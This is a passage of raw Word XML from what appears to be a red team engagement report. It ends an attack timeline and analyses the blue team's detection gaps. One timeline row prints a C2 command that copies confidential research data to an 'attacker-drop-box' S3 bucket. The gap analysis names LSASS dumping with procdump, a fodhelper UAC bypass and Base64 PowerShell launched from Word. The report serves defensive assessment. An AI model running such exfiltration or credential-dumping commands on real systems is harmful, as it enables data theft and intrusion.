            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7129C736" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>T+3:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ACC5BB3" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Collection/Exfiltration</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (T1048.003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CE6D03F" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>C2 Command:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">shell </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> s3 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> s3://cpc-research-data-staging/confidential_research_data.json s3://attacker-drop-box/exfil/research-dump.json --profile </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>svc_aws_sync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DCFE237" w14:textId="208ED61E" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Single, low-volume, legitimate-looking data transfer using the standard AWS CLI over the whitelisted AWS egress</w:t>
            </w:r>
            <w:hyperlink w:anchor="fourth" w:history="1">
              <w:sdt>
                <w:sdtPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                  <w:id w:val="1965534535"/>
                  <w:citation/>
                </w:sdtPr>
                <w:sdtEndPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                </w:sdtEndPr>
                <w:sdtContent>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> CITATION PTE25 \l 1033 </w:instrText>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="00624BF5" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:noProof/>
                      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    </w:rPr>
                    <w:t>[4]</w:t>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:sdtContent>
              </w:sdt>
            </w:hyperlink>
            <w:r>
              <w:t>. This technique is designed to bypass basic network firewalls.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B265650" w14:textId="6CF5DD4C" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>CloudTrail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve"> Log:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>s3</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:PutObject</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">event showing the data being copied (sourced from </w:t>
            </w:r>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>192.168.1.50</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) to an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>External (untrusted)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> S3 bucket (</w:t>
            </w:r>
            <w:r w:rsidRPr="00987EF5">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>attacker-drop-box</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:hyperlink w:anchor="fourth" w:history="1">
              <w:sdt>
                <w:sdtPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                  <w:id w:val="1481501590"/>
                  <w:citation/>
                </w:sdtPr>
                <w:sdtEndPr>
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                  </w:rPr>
                </w:sdtEndPr>
                <w:sdtContent>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> CITATION PTE25 \l 1033 </w:instrText>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r w:rsidR="00624BF5" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:noProof/>
                      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                    </w:rPr>
                    <w:t>[4]</w:t>
                  </w:r>
                  <w:r w:rsidR="00794D0D" w:rsidRPr="00624BF5">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:sdtContent>
              </w:sdt>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Cloud DLP Failure:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> No alert on the transfer of data tagged as PII/IP to an external resource.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7740E53F" w14:textId="05950C0D" w:rsidR="00DF6CEB" w:rsidRDefault="00DF6CEB" w:rsidP="00A7467C"/>
    <w:p w14:paraId="630D69B5" w14:textId="03DA674D" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00A7467C">
      <w:r w:rsidRPr="002E59E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CB9B6AF" wp14:editId="30EF4AFB">
            <wp:extent cx="5943600" cy="32480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43600" cy="3248025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7AB62" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc215571139"/>
      <w:r>
        <w:t>Reporting and Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2E668E11" w14:textId="77777777" w:rsidR="0044735A" w:rsidRPr="0044735A" w:rsidRDefault="0044735A" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc215571140"/>
      <w:r w:rsidRPr="0044735A">
        <w:t>Technical Report for the Blue Team (Detection Gaps)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2F64F63F" w14:textId="2950943C" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve">The Red Team successfully </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>exfiltrated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> the target data. The primary reason for success was the combination of poor credential hygiene, misconfigured cloud identity policies, and profound blind spots in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07609">
        <w:t>behavioural</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> logging and monitoring across the hybrid estate. The Blue Team's failure to detect the operation at multiple critical junctions indicates that their security controls are focused on preventing old threats (file-based malware) rather than detecting modern, stealthy TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47A115" w14:textId="77777777" w:rsidR="00AB7B99" w:rsidRDefault="00AB7B99" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FB8670" w14:textId="77777777" w:rsidR="00EE4184" w:rsidRPr="00AB7B99" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Detailed Detection Loops &amp; Failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11612812" w14:textId="4DA909ED" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4184">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:tab/>
        <w:t xml:space="preserve">EDR/HIDS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007609F0">
        <w:t>Behavioural</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> Gap (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> Execution): The Endpoint Detection and Response (EDR) </w:t>
      </w:r>
      <w:r w:rsidR="00AB7B99" w:rsidRPr="00EE4184">
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>findings</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> CPC-WS01 failed </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>to detect</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> the exceptional use of Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00384BDB" w:rsidRPr="00EE4184">
        <w:t xml:space="preserve">binaries. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t>Specifically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574AE28D" w14:textId="50E737FD" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T1059.001:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> The execution of a </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>PowerShell.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> command line with a heavy Base64 payload, spawned directly by a benign application like WINWORD.exe, was missed. A modern EDR should have an analytical rule flagging Process Parent-Child Deviation (i.e., a word processor should not spawn a shell) </w:t>
      </w:r>
      <w:hyperlink w:anchor="First" w:history="1">
        <w:r w:rsidRPr="00045479">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[1].</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EE214E9" w14:textId="77777777" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T1003.001:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> The execution of procdump64.exe (or similar memory access utility) with the -ma lsass.exe arguments is a known high-fidelity indicator of LSASS dumping. The Blue Team's SIEM did not have </w:t>
      </w:r>
      <w:r w:rsidR="00384BDB" w:rsidRPr="00EE4184">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> quick, critical alert configured for this specific command-line signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724918BE" w14:textId="6637E889" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T1548.002:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> of the UAC bypass technique (via fodhelper.exe) was unmonitored. This technique is easily detectable by monitoring registry key access or process tree anomalies, yet it </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> the high-integrity context required for the subsequent dumping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794712A7" w14:textId="3366FA32" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4184">
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:tab/>
        <w:t xml:space="preserve">Credential Hygiene and PAM Failure: The storing </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve">cloud </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>capabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> in plaintext on a standard endpoint (</w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>C:\Temp\keys.txt.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve">.txt) represents the single most unfortunate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007609F0">
        <w:t>organisational</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> failure, directly facilitated on the Cloud Pivot. The Blue Team required basic automated security tooling</w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> such as a Secret Scanning solution within their development/build </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>environment</w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> would have flagged and revoked this file during creation. This key failure </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>delivered</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> all subsequent network-level controls moot, as the attacker was now moving with legitimate, whitelisted credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A38495" w14:textId="77777777" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4184">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:tab/>
        <w:t xml:space="preserve">Critical Cloud Logging Gap (Identity and Egress): While AWS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> logs were apparently active, the Blue Team required specific, high-priority alerting rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2221F8" w14:textId="2980DE41" w:rsidR="00EE4184" w:rsidRPr="00EE4184" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T1098.004:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> To </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>CreateAccessKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> API call originating from an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>internal,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> on-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>prem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> workstation IP (192.168.1.50) should </w:t>
      </w:r>
      <w:r w:rsidR="00AB7B99" w:rsidRPr="00EE4184">
        <w:t>have generated</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> a P1 incident </w:t>
      </w:r>
      <w:hyperlink w:anchor="fourth" w:history="1">
        <w:r w:rsidRPr="00045479">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[4].</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> Access Key creation should be strictly restricted to CI/CD systems or dedicated IAM administrators via jump hosts, not general workstations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DF8C4" w14:textId="06D301A6" w:rsidR="00AB7B99" w:rsidRPr="00141FDA" w:rsidRDefault="00EE4184" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T1048.003:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AB3F18" w:rsidRPr="00AB7B99">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00AB3F18" w:rsidRPr="00EE4184">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB3F18" w:rsidRPr="00EE4184">
        <w:t>PutObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> event where the target data was transferred to an external S3 bucket (attacker-drop-box) must be monitored [</w:t>
      </w:r>
      <w:hyperlink w:anchor="fourth" w:history="1">
        <w:r w:rsidRPr="00045479">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve">]. This is an explicit data egress event to an untrusted endpoint. The lack of a robust DLP (Data Loss Prevention) capability integrated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE4184">
        <w:t xml:space="preserve"> allowed this final, critical action to occur silently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD5097" w14:textId="77777777" w:rsidR="00141FDA" w:rsidRDefault="00141FDA" w:rsidP="00141FDA">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C9A572" w14:textId="77777777" w:rsidR="00141FDA" w:rsidRDefault="00141FDA" w:rsidP="00141FDA">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDCD22B" w14:textId="77777777" w:rsidR="00141FDA" w:rsidRPr="00AB7B99" w:rsidRDefault="00141FDA" w:rsidP="00141FDA">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
